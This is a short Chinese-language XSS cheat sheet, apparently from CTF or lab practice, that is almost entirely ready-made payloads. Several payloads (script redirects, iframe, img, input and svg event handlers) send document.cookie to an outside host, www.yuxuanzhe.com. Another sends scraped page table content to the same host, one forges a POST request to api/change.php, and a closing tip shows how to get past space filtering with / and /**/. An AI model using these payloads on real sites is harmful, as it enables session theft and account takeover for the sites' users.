|
测试输入框
用户名
密码等
会写JavaScript外带
burp suite找到处理页面
外带
<script>window.location.href='http://www.yuxuanzhe.com/x.php?1='+document.cookie;</script>
处理后外带
<script>window.open('http://www.yuxuanzhe.com/tmp/flag.txt'+document.getElementsByClassName('layui-table-cell laytable-cell-1-0-1')[1].innerHTML)</script>
外带
<iframe onload="window.open('http://www.yuxuanzhe.com/x.php?1='+document.cookie)"></iframe>
post传参
<script>$.ajax({url:'api/change.php',type:'post',data:{p:'123'}});</script>
外带
<script>
var img = document.createElement("img");
img.src = "http://www.yuxuanzhe.com/x.php/?1=" + document.cookie;
</script>
这个虽然是图片,但还是有效果。这个代码要加载资源就要访问后面的url,无论这个url是否真的是图片,它终究还是get提交了cookie。
其他更多的也是同理
<input onfocus="window.open('http://www.yuxuanzhe.com/x.php/?1=' + document.cookie)" autofocus>
<svg onload="window.open('http://www.yuxuanzhe.com/x.php/?1=' + document.cookie)">
过滤空格可以用/和/**/绕过
|